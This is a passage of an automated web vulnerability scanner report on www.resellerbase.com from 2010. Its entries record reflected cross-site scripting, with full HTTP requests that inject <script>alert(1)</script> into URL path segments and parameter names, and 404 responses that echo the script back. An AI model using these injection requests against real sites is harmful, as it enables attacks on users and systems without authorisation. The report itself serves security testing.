GET /communication/themesf5a6f<script>alert(1)</script>da2b24e53ec/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesf5a6f<script>alert(1)</script>da2b24e53ec/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.722. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3036<script>alert(1)</script>0fadd6db461 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmosb3036<script>alert(1)</script>0fadd6db461/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmosb3036<script>alert(1)</script>0fadd6db461/images/rating/ was not found on this server.</p>
...[SNIP]...

2.723. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a6ec<script>alert(1)</script>3026ae867b9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images8a6ec<script>alert(1)</script>3026ae867b9/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images8a6ec<script>alert(1)</script>3026ae867b9/rating/ was not found on this server.</p>
...[SNIP]...

2.724. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 595e6<script>alert(1)</script>84bec1c88ad was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating595e6<script>alert(1)</script>84bec1c88ad/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating595e6<script>alert(1)</script>84bec1c88ad/ was not found on this server.</p>
...[SNIP]...

2.725. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 25dd6<script>alert(1)</script>d39083a4f8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/?25dd6<script>alert(1)</script>d39083a4f8f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/?25dd6<script>alert(1)</script>d39083a4f8f=1 was not found on this server.</p>
...[SNIP]...

2.726. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71663<script>alert(1)</script>53da57909ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication71663<script>alert(1)</script>53da57909ec/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication71663<script>alert(1)</script>53da57909ec/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.727. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f04f8<script>alert(1)</script>2e9739f1662 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesf04f8<script>alert(1)</script>2e9739f1662/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesf04f8<script>alert(1)</script>2e9739f1662/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.728. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 348cd<script>alert(1)</script>0aa28241288 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos348cd<script>alert(1)</script>0aa28241288/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos348cd<script>alert(1)</script>0aa28241288/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.729. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d79ff<script>alert(1)</script>7fb277d05fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/imagesd79ff<script>alert(1)</script>7fb277d05fe/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/imagesd79ff<script>alert(1)</script>7fb277d05fe/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.730. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7a256<script>alert(1)</script>6cf8caed516 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating7a256<script>alert(1)</script>6cf8caed516/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating7a256<script>alert(1)</script>6cf8caed516/2half.gif was not found on this server.</p>
...[SNIP]...

2.731. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2a28b<script>alert(1)</script>f26e7fe6e6d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/2half.gif2a28b<script>alert(1)</script>f26e7fe6e6d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/2half.gif2a28b<script>alert(1)</script>f26e7fe6e6d was not found on this server.</p>
...[SNIP]...

2.732. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/2half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3dbbc<script>alert(1)</script>5d5a429a267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/2half.gif?3dbbc<script>alert(1)</script>5d5a429a267=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/2half.gif?3dbbc<script>alert(1)</script>5d5a429a267=1 was not found on this server.</p>
...[SNIP]...

2.733. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48f31<script>alert(1)</script>d7e2c3f17df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication48f31<script>alert(1)</script>d7e2c3f17df/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication48f31<script>alert(1)</script>d7e2c3f17df/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.734. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b624<script>alert(1)</script>a09de9fa1ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes1b624<script>alert(1)</script>a09de9fa1ef/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes1b624<script>alert(1)</script>a09de9fa1ef/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.735. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0266<script>alert(1)</script>0d8ce9279d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmosc0266<script>alert(1)</script>0d8ce9279d/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmosc0266<script>alert(1)</script>0d8ce9279d/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.736. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bdf62<script>alert(1)</script>7ea9535b9ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/imagesbdf62<script>alert(1)</script>7ea9535b9ba/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/imagesbdf62<script>alert(1)</script>7ea9535b9ba/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.737. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e445a<script>alert(1)</script>e9be285c159 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/ratinge445a<script>alert(1)</script>e9be285c159/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/ratinge445a<script>alert(1)</script>e9be285c159/4.gif was not found on this server.</p>
...[SNIP]...

2.738. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ef829<script>alert(1)</script>8d908baa82c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/4.gifef829<script>alert(1)</script>8d908baa82c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/4.gifef829<script>alert(1)</script>8d908baa82c was not found on this server.</p>
...[SNIP]...

2.739. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b4ce2<script>alert(1)</script>1486976a136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/4.gif?b4ce2<script>alert(1)</script>1486976a136=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/4.gif?b4ce2<script>alert(1)</script>1486976a136=1 was not found on this server.</p>
...[SNIP]...

2.740. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 10bd5<script>alert(1)</script>8357d8bad7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication10bd5<script>alert(1)</script>8357d8bad7a/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
